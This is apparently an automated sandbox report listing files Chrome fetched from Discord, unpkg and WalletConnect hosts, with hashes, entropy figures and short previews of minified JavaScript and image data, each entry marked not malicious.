                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["70941"],{606863:function(e,t,n){"use strict";e.exports=n.p+"321a07cbc6f5919dbce9.svg"},839491:function(e,t,n){"use strict";e.exports=n.p+"a826e445dff97cf15335.svg"},164654:function(e,t,n){"use strict";e.exports=n.p+"1f3e315f020ed5635dc1.svg"},540346:function(e,t,n){"use strict";e.exports=n.p+"1af9bdf041e000508e41.svg"},526094:function(e,t,n){"use strict";e.exports=n.p+"7442b576347c1d02886f.svg"},367469:function(e,t,n){"use strict";e.exports=n.p+"3205da2e8f78633583d0.svg"},23933:function(e,t,n){"use strict";e.exports=n.p+"8f581f91e7e650ac87a2.svg"},283397:function(e,t,n){"use strict";e.exports=n.p+"44d5e1639bc492dc8d62.svg"},671306:function(e,t,n){"use strict";n.r(t),n.d(t,{ScreenXIcon:function(){return l}});var s=n("37983");n("884691");var i=n("669491"),a=n("75196");let l=e=>{let{width:t=24,height:n=24,color:l=i.default.colors.INTERACTIVE_NORMAL,colorClass:r="",...u}=e;return(0,s.jsxs)("svg",{...(0,a.default)(u),xm
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):189943
                                                                          Entropy (8bit):4.83787889703602
                                                                          Encrypted:false
                                                                          SSDEEP:3072:RoGevDLpn3xNyFsIb8Nsqj2wxl35UAQmLjjG9:c/sqj2wxl35UAQmLn2
                                                                          MD5:2C8A01EC74AD04035AB76F44D44286E8
                                                                          SHA1:AE0C2B93DDF4A53181DB2EEFF47075EDC7385C59
                                                                          SHA-256:086D2FAC555012B86AD7A63B8965BB924D198A8F021DCDC33F27A2D88E64A70F
                                                                          SHA-512:9B47B1E2EC83D587F82F42250869D525DB86A322B36433B0094697B020C26BAF99B98C263AF44139C3BC282E28F878A094AC737CA36C5EC8D178AFA9A3151987
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/97146.ba5d381e14f798be8b84.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["97146"],{440540:function(i,t,x){"use strict";i.exports={v:"4.8.0",meta:{g:"LottieFiles AE 3.0.2",a:"",k:"",d:"",tc:""},fr:60,ip:2,op:81,w:1280,h:720,nm:"FrameEffect_10-1_Out",ddd:0,assets:[{id:"image_0",w:35,h:35,u:"",p:"",e:1},{id:"comp_0",layers:[{ddd:0,ind:3,ty:2,nm:"smile",refId:"image_0",sr:1,ks:{o:{a:0,k:100,ix:11},r:{a:0,k:0,ix:10},p:{a:0,k:[19.875,20.125,0],ix:2},a:{a:0,k:[17.25,17.25,0],ix:1},s:{a:0,k:[108.7,108.7,100],ix:6}},ao:0,ip:0,op:914,st:0,bm:0}]}],layers:[{ddd:0,ind:1,ty:0,nm:"particle",refId:"comp_0",sr:1,ks:{o:{a:0,k:100,ix:11},r:{a:0,k:0,ix:10},p:{a:1,k:[{i:{x:.487,y:1},o:{x:0,y:0},t:2,s:[640,883.838,0],to:[0,0,0],ti:[0,0,0]},{i:{x:.667,y:1},o:{x:.333,y:0},t:16,s:[640,296,0],to:[0,0,0],ti:[0,0,0]},{i:{x:.667,y:1},o:{x:.333,y:0},t:28,s:[640,392,0],to:[0,0,0],ti:[0,0,0]},{i:{x:.667,y:1},o:{x:.333,y:0},t:40,s:[640,347.2,0],to:[0,0,0],ti:[0,0,0]},{i:{x:.667,y:.667},o:{x:.167,y:.167},t:51,s:[640,360
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):82747
                                                                          Entropy (8bit):5.679672791412966
                                                                          Encrypted:false
                                                                          SSDEEP:1536:qTBi8SMfGyYZJ4+SpZKAgm2kbLYlhta6UUYKIm4Zp3vCvd:qTBikqJ4xReUUYU
                                                                          MD5:4E7698434544147DE329C051076D9C61
                                                                          SHA1:EC871133FFF328705276ED6F51C44ECC6D7CAA0B
                                                                          SHA-256:1504B113648F40A3DEB7D19D943F57F15E15D2D2533B6496BC0213AE56583BD2
                                                                          SHA-512:D4CED07E1D6EABDA546BB0D6DF670D3B0B04E9B040EFABB9AA70B160102929D0303FD0593872DE942FCA3291CA3308B36E15CADDB5F70A6F62C46E89D3FE953A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/74783.f757e19ccddf8f692dc9.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["74783"],{666020:function(e,t,n){"use strict";n.r(t),n.d(t,{subscribeMembers:function(){return r},unsubscribeMembers:function(){return o},subscribeChannel:function(){return u},subscribeChannelDimensions:function(){return s}}),n("424973");var i=n("913144"),l=n("696605");function r(e,t){i.default.dispatch({type:"GUILD_SUBSCRIPTIONS_MEMBERS_ADD",guildId:e,userIds:t})}function o(e,t){i.default.dispatch({type:"GUILD_SUBSCRIPTIONS_MEMBERS_REMOVE",guildId:e,userIds:t})}function u(e,t,n){i.default.dispatch({type:"GUILD_SUBSCRIPTIONS_CHANNEL",guildId:e,channelId:t,ranges:n})}function s(e){let{guildId:t,channelId:n,y:i,height:r,rowHeight:o}=e;function s(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0;return Math.max(0,Math.ceil(Math.ceil(e/o))+t)}let a=[];function c(e){let t=e+(l.MINIMUM_RANGE-1);return a.push([e,t]),t+1}let d=s(.5*r),f=s(i,-d),E=s(i+r,d);for(f>0&&(f=Math.max(c(0),f)),f=Math.floor(f/l.MINIMU
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 500x476, components 3
                                                                          Category:dropped
                                                                          Size (bytes):31502
                                                                          Entropy (8bit):7.967824723595221
                                                                          Encrypted:false
                                                                          SSDEEP:768:DvxDp0k7Qe+5TPIAyn1qLoyQbV3JtKyVLg:LVp0kSPIvnAQbVfVE
                                                                          MD5:35EED93E3B831B66027DD53322E552E1
                                                                          SHA1:0F521B56347E5026A48AEB8FC3D6290A94EDAD7F
                                                                          SHA-256:0DD2F77B5F6903E01CDD68EC04A1060BEBA59A7D889729E52F500A1FACF3FB84
                                                                          SHA-512:D2AD41C9C887FFCAA7DDC87315A7139F3415ADDB6EF39FDB2D5A129791CFA7343BC956AFB9DE04E46CA6B0599A7AAE18CDCD2BB368FCE4AA61CAAD40300D3F35
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".........................................................................N..HUd.Q.@.SH.3a.aKc2.....b.X.2.......+...a.d..($..D[.kP.~.#jT.....>.>%..zc.........,..I.aAK9=f!.1.bCX.,...........:...)%..2.....0h.;#...E."..B.FRD.$..(.r.'...j..3.6.b.u.2....Rs..Z.Ti..."..%Z....4.w..h.L..P.. ..$........X0[0..Fr#...c.H.....Kb:.M]E..K....8...U.R&.Zg3.5C.....DJ..d#.......%k.-..%.bCI..f.8...O...R.2...*Lu....K..e$. f.*......0..K.....KQ.UJd&8.....#.iPr..u..........E...B..!....Ul#e*.W..Z5......>."..s..1..!...b.1L..1.`.a..I W...V..."*...".e".. ...c<U.B.J:.fW.8.u"*..."...$.........x.ZA..X...\@\..$..0..Zf.)9..-T...*...%..=.Z1..SO..Th..y@........7;..;..%28..1V..2%t.TP. .....RId".B`.D...I..SsT.#sP....... (..d P..9.Q9..WR6R;-.N....J...d.L...(T.).Sa1..D@.8..K..$....68.:.KHUi...J.\....PB.J.%ZL9.(r#P.5$..Up.....@.4i...t1U...'9.\f.g.l..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:exported SGML document, ASCII text, with very long lines (20577)
                                                                          Category:downloaded
                                                                          Size (bytes):20630
                                                                          Entropy (8bit):5.213112047658201
                                                                          Encrypted:false
                                                                          SSDEEP:384:/yEAHaGxg5t8AMK1pLdGZVpHrG1vhhdydvxT00NQpCjlhEokkn2Z:/7AHYl1xdGZ7HrGhdydvivsJhxX2Z
                                                                          MD5:BA0CCA7D871B0DE10A4344BE2427733F
                                                                          SHA1:4D4149ACF6C6694000B0B4A5F18B4BFF6ABA6878
                                                                          SHA-256:066DEB7F1B943E4CCEFDC62FC9DC214596787F8904A464DE52BBAECF02AD8D86
                                                                          SHA-512:9F013080AC8831678F58E2DFB4F03C5BE0E17732CA4DA81E2D5C9EF2107E9271D0CE5172340A1BC16FE2346FA66BF75BEF54883C0C3196A2A8A5D829E39A08D9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/482.6e1c86f88a37a71d42ec.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["482"],{724079:function(e,t,n){"use strict";n("424973");var i=n("590484");function o(){var e={},t=0,n=0,i=0;return{add:function(o,r){!r&&(r=o,o=0),o>n?n=o:o<i&&(i=o),!e[o]&&(e[o]=[]),e[o].push(r),t++},process:function(){for(var t=i;t<=n;t++){for(var o=e[t],r=0;r<o.length;r++)(0,o[r])()}},size:function(){return t}}}e.exports=function(e){var t,n=(e=e||{}).reporter,r=i.getOption(e,"async",!0),a=i.getOption(e,"auto",!0);a&&!r&&(n&&n.warn("Invalid options combination. auto=true and async=false is invalid. Setting async=true."),r=!0);var s=o(),l=!1;function c(){for(l=!0;s.size();){var e=s;s=o(),e.process()}l=!1}function d(){t=u(c)}function u(e){return setTimeout(e,0)}return{add:function(e,n){!l&&a&&r&&0===s.size()&&function(){t=u(c)}(),s.add(e,n)},force:function(e){!l&&(void 0===e&&(e=r),t&&(function(e){clearTimeout(e)}(t),t=null),e?function(){t=u(c)}():c())}}}},590484:function(e,t,n){"use strict";(e.exports={}).getOption
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):164
                                                                          Entropy (8bit):5.185244990920369
                                                                          Encrypted:false
                                                                          SSDEEP:3:tLvNR9dXKq8NR9dXLZHKVRNxSjTkFCDZRMY6JL9Wg5VXRsOpuEbcwOhH1o:5vkrZurEYCARLb/RsOpuE5OhH2
                                                                          MD5:EC073B89D1E7BA84181549612598648C
                                                                          SHA1:EDCBBB9DE4CB3D6A50C166D9867D765C3B122D75
                                                                          SHA-256:5331B7EF4AFAACECF3A1A72C0D956C88E358D413574639A6E6C24EBDEC7B757B
                                                                          SHA-512:D5A2DF06CA8EEECFF545C3213EAB7ECC3E493C2591FB590AD847AA851AAD587D89F0A7EC36AD8B1289466D9EF1B40065C9BAA04D3F472C32DFD86E0F5FEC5538
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/09563300dbb31ab193bc.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["85756"],{722885:function(p,c,s){"use strict";p.exports=s.p+"15551c6c9d4d1a96ba76.woff2"}}]);
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):20966
                                                                          Entropy (8bit):7.984913243881453
                                                                          Encrypted:false
                                                                          SSDEEP:384:rrgAhXkoqWFiys6gZGyJKT97RFFwKdd42L/f+mklx4rZLmceeSegx3D/nxdQTtL:gAhXkwiyLgZGyYn0If+rxaLm9l7x4d
                                                                          MD5:550DDA9027688B4960563B18B541ECF9
                                                                          SHA1:9576B6E174E11A5FFA1A41D831303050F31FDB18
                                                                          SHA-256:FE5422EC939527F5FDC4E8069A22E330ADE213C0C0565C85F0A72EF4B21A5E4F
                                                                          SHA-512:3BDF403909A8C8E848ECE034AC232BF42F3C1244E5F6827A7CAC9938036F10A94E88D34162614A3AE5DC718190AD81F187EC10CCFBFEBD0DB02440C423E5231A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_kfxape_034a85ee89.png
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx..wX....im..&l....{.7.(h.ZW.n]U.e...jk....:..vo.vWA......<....'(..+@ ..|......Q...V.>...+...~..../....M..M..5r.z..5..........-..F..q..o.*..j7J...J.{J....z.....lbC..\........u.n6..2..&.3....\8...dqv.8......Irc...F...hb.........w.6pz;...&6|...}....*]..=.).'nl...&6R..Ld*7.F.../_.E..l....z..?@..4.a....6...."c....ho..8......k@.e..tn`....Q.}.}...F.m....-|D.....n..=.\........n.....\...F.....`....`.....A..#.7.nB.C.F...7..!Z#............M.x...pC.&t<Dk...u.].-+F.?...M.....c..-|-.......,#.......w..C..59@W3..-. n...v..i...6...r.....-....o[...V....v.y{..pi."...*.. ...Q8.E.A..9...7.....j.R....f.........IN.4..4.@............;..;.#.nT..v....,.3.*.3.....K.yU.F..1...2....My;.L;....l..F.+(...e....^}.).3.<.h....6.D].l%_/....m*yq..h}.!oV...8...h!...#C........0i|Z.I.I&...$.$K._.K.*.H~.l......].E2.3HJN.I.H 1I.$8*.DFxK..X..&|q.WA.?t...!\...R0.....I.5e...K.Xg'9=.\...?3.W.f.K.g........qdBdorV..f...bR3..j..`r}.TT.@
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):3146
                                                                          Entropy (8bit):4.484082045212369
                                                                          Encrypted:false
                                                                          SSDEEP:48:C4LO/K7oWBkomgBkRzd0kJBJkI8JkINGD/dYk2kahkzd/FnLgkpmZ5ZOE83VCn:RO/IS53JBJbKbN4WQbMRZmEAI
                                                                          MD5:81084FF5A27B6E6FF487E479C37D1660
                                                                          SHA1:81A274F69A1358F85715A0FEA227730D795CB353
                                                                          SHA-256:075DE1D6EA4FB470197A88BA371F60F70B819B250CB5AF8BD6A4794B1A9CA4A1
                                                                          SHA-512:CCCD00A5C013B130BE0A8466F903F7EEE9306518DFAA8758849027EBC1829EA2A6B7516E4D2070B110A12EC7EB559E3B75D256AD1B07BE3FD8595C0E430DC0D5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 90 59.19">. <defs>. <style>. .cls-1{fill:#6a94ff}.cls-2{fill:#a9c7ff}.cls-3{fill:#202225}. </style>. </defs>. <g id=".._2" data-name=".. 2">. <g id="Layer_1" data-name="Layer 1">. <path class="cls-1" d="M89.59 19.89 84.93 8.38a5.51 5.51 0 0 0-7.19-3l-5.67 2.25A12.42 12.42 0 0 0 56 .91L45.48 5.16c-1.84 4.11-5.48 9.72-11.59 9.52a8.55 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33l-12.66 5.13a12.42 12.42 0 0 0-6.9 16l-5 2A5.52 5.52 0 0 0 .4 42.61l4.67 11.51a5.51 5.51 0 0 0 7.18 3l5.64-2.28A12.43 12.43 0 0 0 32 58.28l40.54-16.44a12.43 12.43 0 0 0 7.73-12.22l6.28-2.54a5.52 5.52 0 0 0 3.04-7.19ZM11.65 52.94a2.76 2.76 0 0 1-3.59-1.52l-3.63-9A2.76 2.76 0 0 1 6 38.87l4-1.65 5.69 14.07ZM22.33 39.6a3.72 3.72 0 1 1 2.06-4.85 3.71 3.71 0 0 1-2.06 4.85Zm33.36-1.55-11.77 4.77A10.61 10.61 0 0 1 30.11 37l-3.33-8.23A4 4 0 0 1 29 23.56l23.31-9.44a4 4 0 0 1 5.18 2.19l3.63 9a9.8 9.8 0 0 1-5.43 12.74ZM67.49 21a3.73 3.73 0 1 1
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                          Category:dropped
                                                                          Size (bytes):15406
                                                                          Entropy (8bit):4.94779670203288
                                                                          Encrypted:false
                                                                          SSDEEP:192:gnV2JwJO5G+rVDJQBcQHfY91HNqIB41YR7vN3E7FqvrPse9mm:fSOUSEyuURNqIB4eR7vNeqvgP
                                                                          MD5:27ADB25B2FE9B48C3E4CD79F86048C6E
                                                                          SHA1:1DD6FF71B20DE26FC81615AB7974410582FA859E
                                                                          SHA-256:7110D187AC41FF48FCD6CE017592C0ECC60631A1D1DBABCF338EB562BFBDE81F
                                                                          SHA-512:B27397BA36AE75BDDC27C14DCB9519240CC7DD2B1097610CE159DF397AB6DEFFDDC442B5EA3690665DDF20301F6A3F3FB11B82301921941A990D78162A42E3C5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... .................................................LMM.FGF7LGB6QQP.........................................GGAVDE>.B@;.><9.:95.DC?.GGB.@AAP........................@@@.LKF.@?:.''#..........!... ..**&.DC@.DD>.UTU.................NJG.:95.01/.BB?.;;8.453.<<:.887./0-.020.<;9.IIF.............TQKXGD@. !.."%!.*+).$$"."" .'&$.++*.&(&."# .!%".BB?.STSN........XUP.*+&. !.. !..B@>.==9.! ..662.EEB. !.. " .%'%./0/.PQL.....gf\.PLI."#!."" .""!.db^.ZXU.440.gea.nnk..!..!$ .%'%.(*).HIE.P`P.snf<EC>.$%!.#$!.! ..^]X.................564.!#!."%#.$(&.AB>.SSN1wrk<HEA.((&.%'".!"!.LLI.................\\Z."$ ."%".'('.CC?.__X1.{z.YUQ.((&.')$.)(&.BA>.....qmj.........\\X.!#!."'$.(+(.MKG.``a.....tli.-,*.,+(.*)'.((&.AA=.DB?.qnj.{yt.hgb. # .$&$./1..QQL.........{tqXPLH.+*(.,,+..-+.'&$./.,.OMI.xvq.774."'#.%&%.BA=.RRNN............ysm.@?:.''%.SPM.WSO.TRN.VUP.IHD.LJF.#&#.@?;.YWS.....................|wq.OKG../,.-,*.))(.((&.&&%.,,*.IFC.[ZS.UUT...................
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (17610)
                                                                          Category:downloaded
                                                                          Size (bytes):17665
                                                                          Entropy (8bit):5.582173223098381
                                                                          Encrypted:false
                                                                          SSDEEP:384:7umZbMocEyrGo/MgpKpCCqswKdzpqlPGNMcXYLVeP+4IiYzfAQTvcNz:7uOgou7Ahq8MdLVeP+4RY7AkcNz
                                                                          MD5:4CCFA2E22AA81B9717908BD2E198C04B
                                                                          SHA1:77C537671DAF78C65664C86B2348A8901076B2F1
                                                                          SHA-256:B7094A75DFA107FDACECB7D4DE84339C5BBBDD4F7D138DE620E58FCACAE645DE
                                                                          SHA-512:C6A5FB1B2DC721D4AEE0F15E07245CEBFD701E90ACE4FADA419561D920A46850DB5F7C6DDFBFAA6BDC2A0F277BEB4561DB94C7C2681C06A61EA2BD62C27A1405
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/60499.862663374dc7b2606eb6.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["60499"],{340616:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return c}});var n=r("37983"),l=r("884691"),i=r("132710"),a=r.n(i),s=r("77078"),u=r("812204"),d=r("685665"),o=r("128259"),c=l.memo(function(e){let{onClick:t,trusted:r,title:i,href:c,children:f,messageId:v,channelId:g,...h}=e,{analyticsLocations:E}=(0,d.default)(u.default.MASKED_LINK),C=l.useCallback(t=>(0,o.handleClick)(e,t,E),[E,e]),I=l.useCallback(e=>{1===e.button&&C(e)},[C]),R=a.sanitizeUrl(c);return(0,n.jsx)(s.Anchor,{...h,title:i,target:"_blank",rel:"noreferrer noopener",href:R,onClick:C,onAuxClick:I,children:null!=f?f:i})})},225389:function(e,t,r){"use strict";r.r(t),r.d(t,{CircleInformationIcon:function(){return a}});var n=r("37983");r("884691");var l=r("669491"),i=r("75196");let a=e=>{let{width:t=24,height:r=24,secondaryColor:a="transparent",secondaryColorClass:s="",color:u=l.default.colors.INTERACTIVE_NORMAL,colorClass:d="",...o}=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Java source, ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):275
                                                                          Entropy (8bit):4.840418070226538
                                                                          Encrypted:false
                                                                          SSDEEP:6:DWWclFbaq6HdXNDy5KfU7xUVMX91QVERFPCClxJdG5+4b:Dalph69Xs54wxYoXQuvPNxJdGwU
                                                                          MD5:E02FD7078A76CE6A730B3F937F3ACF3B
                                                                          SHA1:C7B378EDB851FFA7D85C8098E9684547E0216F5F
                                                                          SHA-256:225115B33BE5725ED87E0F5348FB03ED3750978F4874B8447E7C19F79432D1FA
                                                                          SHA-512:5D84000EDDFF5BF2B07C9D5CEF0420269EDA9508F2363D5A860D9DD1191A8ED2A363F12AF061990F8ED3423AC2276326F4D35B0265C15793B4F805E15ED25EC5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/bundle.js
                                                                          Preview:import{aA as e,aw as o,ax as s,ay as C,az as i,aB as m,aC as n}from"./bundle-b2289479.js";export{e as EthereumClient,o as WagmiCore,s as WagmiCoreChains,C as WagmiCoreConnectors,i as WagmiCoreProviders,m as w3mConnectors,n as w3mProvider};.//# sourceMappingURL=bundle.js.map.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                          Category:downloaded
                                                                          Size (bytes):9194
                                                                          Entropy (8bit):7.975234276699637
                                                                          Encrypted:false
                                                                          SSDEEP:192:CtPcE7O1HVELtAp1fURiBfZMH4QO9E0bEjvvn+aONj80P4LTe56AnA+J:CtPcE75Lt+OGfZSEEDn+Q0A+56+A+J
                                                                          MD5:835880C74B2B75B4B6F5F0AF0115438C
                                                                          SHA1:3CBB7C955C08CCBD8E4E0A2031BF8DAA0754AAFB
                                                                          SHA-256:8C8D2BDA4F39810C8650A74CECE803FF55B40BD234F9CA35068B6155E0BC7555
                                                                          SHA-512:2A090FFF707486677F1D3E8BEBD1C42870E77F9567B6B2ABF0578BC5B3206F5D5005DC964BA2C1D2F643E537253365507814E16131A5DD8A6773AE759D4ED9F2
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getWalletImage/b6ee4efc-f53e-475b-927b-a7ded6211700?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
                                                                          Preview:RIFF.#..WEBPVP8 .#......*....>I$.E".!.)..(....~....|a...s.....W.......3..._..-.c....`|....s.O.o.^.?O.....@.=.........././P......~......................~....n}.........w........s.........?..r.{...G.O_........`...3...#.............{.......o.....m}@...?.w.>.>.............=....r...!.....O...{..=...c.../.AL...N.{.....8......vS.Uy;'..{.L{HX..]'...*.....L.$...)..h.4%k.Z|.........7.c.......R=..<.*f......y..A.&.@......A ..O..W.+.v!.Yo.~..0..h...eE.W.5.a>qD......d.J.G,j...0mc..P..s`..o.."..b.W.'e;.W.x>%"'.v.(.4.%g...W..........m....E...W....M.$/.9..OVT.Fq...x0'.Hh......;k...Y..<..a.p.s..bX.}.<<......X.E&z^..i."vl.It..H.. \a.7..!.B..R?...iL.+r.jcg..|.......Z.D.b)..q.....=m.@.. @L..|K(M..S. ..`.X...w..g?S..8+..A......c.....!..c!.N......Q.t.b...4X...%..v?6.....5I.9.z<..j...+W.x'.Y.7.)Z...,..U...........u.D....MO.]....e..DyL.s$.{>.iu.t...I..j.s..s...++.E...I.sA<...k,.Nj...V..*.k.N....\...00f.Y)...j../r.'.XQt..-..T:......A....GzZ...R..Xj.:.a.:......wG.2..p.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):1609
                                                                          Entropy (8bit):7.800638949259021
                                                                          Encrypted:false
                                                                          SSDEEP:48:OzTW/iDgzdY/6nVt0dNxUaJp1oV5EQTgC86JUKkrMPoYj:8W/ia2SVYNxVgV5EQTgC+rUj
                                                                          MD5:1C2C1C074AFC2568763EF0F2376CF2D1
                                                                          SHA1:2AB4753C1C3677BF56E9603FEF2BE727E8E53AD9
                                                                          SHA-256:13C5CDB561D98E256A0A6DACFC4F71C6539E38ECAED830186678B1627C4A0DAD
                                                                          SHA-512:E118CB6653279B49225A138F3D7CBC28FD393871394B79E0B796EAD375C1832A8CA4D953D2B25A425C83C686E4FE13FE750F2C7FC7B572AE05A43F7B832598A7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...0...0.....`.......PLTE.........jXH/..|.vWrZ7......~..l\?aM3..x|jO774.......e..r.....{wdE..f.......~vT7+.q`F.......s..P@'~s]dT:.hYZR..aH7"..\R?keO.RM.>;....a..n..ZrkZ../".eO.60.LI......qK.v\.x_.......V.H@...V@.......u.:@......,,,.............()).........|d@%%%..ya>CCB..!..........'///...........$................kT3...iD.. ddd...}}}.................!..P.........Z^.....n...P...ItRNS..............................................._..................`......\.......pHYs.................IDATx...u[.Z..S.FJ..wYl...O.k...M.8........m)....e.Lf....8..........F.....=.....D.a..<r...%`4...lR....i./..m...r.L?..X..}....b.k...3..-...^...U......3.vv..W.J....]Uc..x...f..Rh.......#.-q..8...^....b_.[....R.1. ....B.R9..5...;......8.$K&pU.........i{.41....#2Q-4.....)..|...?...........^kllb......\*..j#.....M'..}..:...[...Z....... h...h ..ut.....v..u.a.7.6.{.p..i.7.L..3..V.#V..j.....#.....3.~.2.Ph%.v.f...5g.u%....9... d.[...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (18553)
                                                                          Category:downloaded
                                                                          Size (bytes):18608
                                                                          Entropy (8bit):5.528058219705062
                                                                          Encrypted:false
                                                                          SSDEEP:192:iO7UmJwZS1b2aZF/nMt3ogrvS2iId3suY7zAFOtttrDja2aRrwDho+opOAym1Smt:LLJwZSM0sJZQyFHINxMM90AI
                                                                          MD5:7B33B1819B26382AD5C4FAB51B026596
                                                                          SHA1:8A042433B6B740B6843EF8CBD7A19816EC69A557
                                                                          SHA-256:B791CFF2AB61D1767D2CFF2DE9F160DC503F1A921FF4B2D2CFEEE45DABBD54DF
                                                                          SHA-512:1DFE4067936CD809950D50C31DC71282791224FD9D012FEA7D64A8F91F5809D58590A321921FD0BD4B3BF93BC24365D872D6E96B7D03E09CA7ADD5A20B8AB590
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/18814.8a9d7b31f5a23de4ecfd.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["18814"],{851387:function(e,t,l){"use strict";l.r(t),l.d(t,{waitForGuild:function(){return P},default:function(){return w}}),l("70102"),l("860677");var n=l("759843"),d=l("316693"),r=l("872717"),o=l("913144"),a=l("333805"),u=l("81732"),i=l("248967"),s=l("21121"),E=l("693051"),c=l("153498"),_=l("934306"),p=l("258158"),f=l("393414"),L=l("239380"),I=l("271938"),T=l("42203"),G=l("383173"),D=l("923959"),h=l("305961"),U=l("18494"),y=l("162771"),S=l("697218"),A=l("599110"),R=l("991170"),m=l("719923"),C=l("840707"),g=l("404118"),O=l("49111"),N=l("782340");let M=e=>{g.default.show({title:N.default.Messages.TOO_MANY_USER_GUILDS_ALERT_TITLE,body:N.default.Messages.TOO_MANY_USER_GUILDS_ALERT_DESCRIPTION.format({quantity:e})})},F=e=>{o.default.dispatch({type:"GUILD_DELETE",guild:{id:e}})},b=()=>{g.default.show({title:N.default.Messages.SERVER_IS_CURRENTLY_FULL,body:N.default.Messages.PLEASE_TRY_AGAIN_LATER})};async function v(e){
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):42621
                                                                          Entropy (8bit):5.126034609264039
                                                                          Encrypted:false
                                                                          SSDEEP:384:ImUN4FBqusasgfvCP/F2HCo6q6j50CrlekrHKM1UmmH2:ImUiqusasgfvYfdj59rlekTKM1Hx
                                                                          MD5:67E02B9AB885897D9B64CABDF827B088
                                                                          SHA1:8BA678D9D8E1DCEF80C670F8C3A9A2796B5711F2
                                                                          SHA-256:37F3A5BC356395291764BC34A4D951C9E7D88CE800A1E484E1C8C54C112D3823
                                                                          SHA-512:AA023C05CE1AC583C9E6FD4647365D745A218A5015838F716A8ED921BE171B0C3A7FD50E452D491E285ED414CE5EA28C156E913605D2ED0E7D16C3F88A8106A4
                                                                          Malicious:false
                                                                          Reputation:low
